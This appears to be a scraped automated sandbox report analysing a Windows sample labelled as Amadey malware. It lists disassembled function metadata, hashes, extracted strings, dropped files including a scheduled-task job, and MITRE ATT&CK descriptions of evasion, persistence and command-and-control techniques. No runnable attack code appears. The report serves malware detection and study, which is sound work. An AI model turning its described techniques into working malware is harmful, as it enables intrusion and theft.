Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 14c0af7a4e5ce3958343ef35a3aeaa1664981e23a70a12af8160e17c7c172adb
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6F11387B20317143DA048A2DF8F45B6A796EAC5B21B3D437AF0614BF58DA32AA4DD900

Function 00C1645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e57cb9026b715493df7d832f7973f1466896deb032f298d0ad15612119cc1c
Instruction ID: 38294db067000f06b8a888f74a9a95cfb665fee6d68d2bad8476559e24494e98
Opcode Fuzzy Hash: 75e57cb9026b715493df7d832f7973f1466896deb032f298d0ad15612119cc1c
Instruction Fuzzy Hash: 1CE08C30041A08BFCE25BB14DC09AC93B1AEB43348F104800FC2886221CF35EDD2EA90

Function 00C1A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: ff39514bcca5c82490ce01187ca2c5ca1b6b52edd21e422d3d815ef31b34f79c
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 80E0B672916228FBCB16DB98C94498AF2ACEB4AB50F654496B511D3251C270DF40EBD1

Function 00BF2E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

invalid stoi argument, xrefs: 00BF425A
stoi argument out of range, xrefs: 00BF4269
WGt=, xrefs: 00BF33BA
HBhr, xrefs: 00BF378F
246122658369, xrefs: 00BF33D4
Fz==, xrefs: 00BF369E
8KG0fymoFx==, xrefs: 00BF2EC7

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 86665c4581d6fa57e7d1c6f51aed9f5d19595efa8665fabfdaf0352355f00fa6
Instruction ID: 2ea9823c2b786823f3220b80cefa45f0e6bb36131a50f48e652471e723e7d122
Opcode Fuzzy Hash: 86665c4581d6fa57e7d1c6f51aed9f5d19595efa8665fabfdaf0352355f00fa6
Instruction Fuzzy Hash: A602C27190024CEFEF14EFA8C855BEEBBF5EF05304F504598E905A7282D7759A88CBA1

Function 00C170C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00C1710B

Strings

.bat, xrefs: 00C1713A
.cmd, xrefs: 00C17129
.exe, xrefs: 00C17118
.com, xrefs: 00C1714B

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 66c22313d1b8779fcac48ea4154e738a1ec9c77da334d2679823a5c2bb89db36
Instruction ID: fb9e8cc4e1705ff5007dbc5fef7377f22edf8fa6dcd59cc8c78ace030b880ae6
Opcode Fuzzy Hash: 66c22313d1b8779fcac48ea4154e738a1ec9c77da334d2679823a5c2bb89db36
Instruction Fuzzy Hash: 7401DB37618626365A1864199C036BF17B89B83BB4B35022BF958F73C1DE44DD827190

Function 00BE2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00BE2F1F
__Mtx_unlock.LIBCPMT ref: 00BE2F8C
__Cnd_broadcast.LIBCPMT ref: 00BE2FA3
__Mtx_unlock.LIBCPMT ref: 00BE30B5
__Mtx_unlock.LIBCPMT ref: 00BE315B

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 7f8ab2f67838e72b6b8623428b55c3b61d51754826f7f88434689d6275e2886e
Instruction ID: 411ffebe14453a43b551af970bb50fa2dba19c3c88d8ca92fdd34cec09ab25d2
Opcode Fuzzy Hash: 7f8ab2f67838e72b6b8623428b55c3b61d51754826f7f88434689d6275e2886e
Instruction Fuzzy Hash: 2DA113B0900349AFDB11DF65C949B6ABBF8FF15710F0042A9E915E7642EB31EA48CBD1

Function 00C1C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C1CA37

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 2b54225cf3229526f2501fe3a2dbca317a65c20aea23f9a1c769c6aea66891bf
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: C6B148329442559FDB11CF28C8D1BEEBBE5EF56340F1481AAF855DB341D6348E81EBA0

Function 00BFBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00BFBAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00BFBB14
_xtime_get.LIBCPMT ref: 00BFBB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00BFBB43

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 5a116a8dbb7b54fb151b1d683e1608c4346005c6a1ea2cfadb9a858d0dd9fafc
Instruction ID: 39fa156c4b70353d3ee5b9d1f4e853e91501bbb20ff4aff9b4d416dbca08d56a
Opcode Fuzzy Hash: 5a116a8dbb7b54fb151b1d683e1608c4346005c6a1ea2cfadb9a858d0dd9fafc
Instruction Fuzzy Hash: A2211D75A0111D9FDF10EFA4DD82EBEBBB8EF48714F1000A5FA01A7251DB31AD498BA1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9ICG2PuZbG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
9ICG2PuZbG.exe

Function 00BEBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Function 00BE65B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Function 00BE5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00BE7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00C16E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 00C1D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Function 00BE82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00C16C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00C16F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00C1D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 00BF6AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON